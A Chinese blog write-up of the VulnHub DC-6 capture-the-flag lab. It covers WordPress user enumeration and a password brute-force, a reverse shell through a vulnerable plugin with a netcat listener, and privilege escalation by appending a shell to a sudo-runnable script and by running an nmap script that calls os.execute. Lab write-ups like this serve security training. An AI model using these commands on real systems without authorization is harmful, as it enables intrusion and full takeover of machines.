vulnhub dc-6 靶场实战

发表于 更新于 分类于 阅读次数: Valine: 本文字数: 888 阅读时长 ≈ 2 分钟

靶场地址:https://download.vulnhub.com/dc/DC-6.zip

信息收集

安装好靶场之后,还是先来扫一下ip

image-20220410112736201

确定IP为:192.168.123.219

服务、端口、后台统统先扫一遍

image-20220410112844961

直接浏览器访问一波192.168.123.219

发现访问不了,抓包查看后,发现需要设置一下重定向

设置重定向

这里我把kali和windows都设置了

  • kali 修改 /etc/hosts

image-20220410113036232

加入 192.168.123.219 wordy

  • windows 修改 C:\Windows\System32\drivers\etc\hosts

image-20220410113218686

然后使用ip访问就正常了

image-20220410113446231

本想查一下是什么类型的cms

没想到网页下面就已经提示了

Proudly powered by WordPress

扫描后台

后台也扫到了

image-20220410113619237

image-20220410113638335

扫描用户

扫描一下用户,扫到了admin、graham、mark、sarah、jens 这五个用户

image-20220410113816955

爆破密码

接下来就是爆破密码

之前已经使用过burpsuite自带的password字典,但是没有爆破出来

把这5个用户名存进txt,使用rockyou.txt字典来爆破

image-20220410113957260

这玩意儿可真够等的

好家伙,这么久的时间(其实没跑出来,时间不等人,我在网上看的攻略,hydra也试了,特么都等好几个消失了),还好给我爆出来一个密码

mark:helpdesk01

登录后台看看

利用插件反弹shell

发现有一个activity monitor插件,下面这个tools功能可以尝试使用nc反弹shell

image-20220410114946547

抓个包,构造一下

image-20220410115015053

kali 开启监听

1
nc -lvvp 8888

连接成功

image-20220410115109395

获取交互式shell

1
python -c 'import pty;pty.spawn("/bin/bash")'

进入home目录看看这些用户文件里都有什么

graham: 里面什么都没有

jens: 存在一个backups.sh shell脚本

mark: 存在一个 things-to-do.txt 文本文件

sarah: 里面什么都没有

在mark用户的things-to-do.txt 里发现了graham的密码

image-20220410115700744

切换到graham用户

看看有哪些可执行权限

image-20220410130029855

发现jens账号可以无需密码执行backups.sh 文件

1
2
3
echo "/bin/bash" >> backups.sh

sudo -u jens ./backups.sh

现在我们就是jens用户了

nmap 提权

发现jens用户拥有nmap执行权限

image-20220410130432337

1
2
3
echo 'os.execute("/bin/sh")' > getshell

sudo nmap --script=getshell

成功拿到root权限

image-20220410130703079

拿到flag

image-20220410130715636